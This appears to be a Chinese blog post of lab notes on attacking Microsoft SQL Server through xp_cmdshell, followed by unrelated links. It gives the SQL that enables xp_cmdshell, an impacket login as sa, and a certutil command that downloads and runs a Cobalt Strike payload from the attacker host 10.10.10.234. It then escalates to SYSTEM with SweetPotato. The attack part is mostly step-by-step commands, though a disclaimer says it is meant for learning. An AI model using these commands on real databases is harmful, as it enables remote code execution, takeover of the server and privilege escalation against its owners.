SQL Server数据库xp_cmdshell提权笔记

文章目录

一、简介

Sql server也称Mssql Server,扩展存储过程中xp_cmdshell是一个开放接口,可以让SQLserver调用cmd命令。此存储过程在SQLserver2000中默认开启,2005本身及之后的版本默认禁止,所以想要使用该存储过程,就需要拥有SA账号相应权限,使用sp_configure将其开启。
xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展"存贮过程"。那么"存储过程",其实质就是一个"集合",就是存储在Sql Server中预先定义好的"SQL语句集合",说的更直白一些就是各种小脚本共同组成的集合体,我们称之为"存储过程"。

二、搭建环境

系统 IP 服务
windows server2012 10.10.10.40 SQL serve数据库
kali-linux 10.10.10.234 攻击方-cobaltstrike

三、利用条件

复制代码
任何版本的Sql Server都可以对xp_cmdshell 进行利用;
SQL Server数据库没有被降权;
sa用户或其他具有dba权限的账户。
1、查询 xp_cmdshell 是否开启,返回为1则证明存在
复制代码
select count(*) from master.dbo.sysobjects where xtype = 'x' and name ='xp_cmdshell';
2、判断权限是不是sa,回是1说明是sa
3、开启xp_cmdshell
复制代码
xp_cmdshell 开关。
【参数解析】
exec 显示或更改当前服务器的全局配置设置。
sp_configure 动态执行SQL语句的命令。

进行开启

复制代码
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
4、关闭xp_cmdshell
复制代码
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure;

四、获取数据库权限

1、成功获取sqlserver,进行登陆
复制代码
路径:~/Desktop/impack/impacket-master/examples
命令:python3  mssqlclient.py sa@10.10.10.40
2、开启xp_cmdshell权限
复制代码
exec xp_cmdshell whami
exec xp_cmdshell ipconfig
enable_xp_cmdshell


3、服务器端开启cobaltstrike,并且开启exe远程访问
复制代码
python3 -m http.server 9999
4、执行命令,进行上线
复制代码
xp_cmdshell certutil -urlcache -split -f http://10.10.10.234:9999/123.exe c:/windows/temp/123.exe                                                                            
xp_cmdshell c:/windows/temp/123.exe
5、成功获取数据库权限

五、提升为管理员权限

1、选取插件SweetPotato(MS16-075)
2、选取刚才上线的sqlserver用户权限
3、此时成功变成system权限

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

相关推荐
岩中竹5 分钟前
广东省省考备考(第四十九天7.18)——判断推理:位置规律(听课后强化训练)
笔记
缘来如此҉6 分钟前
Mysql数据库——增删改查CRUD
数据库·mysql·oracle
apihz28 分钟前
域名WHOIS信息查询免费API使用指南
android·开发语言·数据库·网络协议·tcp/ip
gwcgwcjava34 分钟前
[时序数据库-iotdb]时序数据库iotdb的安装部署
数据库·时序数据库·iotdb
SHUIPING_YANG1 小时前
根据用户id自动切换表查询
java·服务器·数据库
Norvyn_71 小时前
LeetCode|Day18|20. 有效的括号|Python刷题笔记
笔记·python·leetcode
爱吃烤鸡翅的酸菜鱼1 小时前
IDEA高效开发:Database Navigator插件安装与核心使用指南
java·开发语言·数据库·编辑器·intellij-idea·database
超奇电子1 小时前
阿里云OSS预签名URL上传与临时凭证上传的技术对比分析
数据库·阿里云·云计算
神仙别闹1 小时前
基于C#+SQL Server实现(Web)学生选课管理系统
前端·数据库·c#
m0_653031362 小时前
PostgreSQL技术大讲堂 - 第97讲:PG数据库编码和区域(locale)答疑解惑
数据库·postgresql